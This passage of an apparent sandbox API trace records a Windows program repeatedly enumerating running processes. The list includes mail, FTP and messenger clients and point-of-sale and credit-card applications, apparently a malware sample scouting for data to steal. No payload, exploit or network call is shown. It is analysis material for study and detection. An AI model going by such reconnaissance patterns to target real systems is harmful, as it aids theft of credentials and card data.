hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0240.150] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0240.156] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0240.159] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0240.162] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0240.164] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0240.167] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0240.173] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0240.175] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0240.177] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0240.180] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0240.182] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0240.222] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0240.224] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0240.226] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0240.228] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0240.229] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0240.231] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0240.246] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0240.248] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0240.249] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0240.252] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0240.254] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0240.255] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0240.257] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0240.258] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0240.260] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0240.261] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0240.266] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0240.268] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0240.269] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0240.271] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0240.273] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0240.275] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0240.276] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0240.331] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0240.332] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0240.334] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0240.336] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0240.337] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0240.339] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd24, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0240.341] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0240.346] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0240.348] CloseHandle (hObject=0x1494) returned 1 [0240.348] Sleep (dwMilliseconds=0x64) [0240.542] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0240.555] Process32First (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.557] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0240.559] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0240.563] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0240.564] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0240.566] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0240.567] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0240.569] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0240.570] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0240.572] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.573] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.578] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0240.579] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.581] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.582] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.583] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.585] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.586] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.588] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.589] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0240.645] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0240.648] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0240.650] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.651] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0240.653] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0240.657] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0240.659] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0240.660] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.662] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0240.663] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0240.665] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0240.666] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0240.668] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0240.672] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0240.674] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0240.675] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0240.676] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0240.678] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0240.679] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0240.681] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 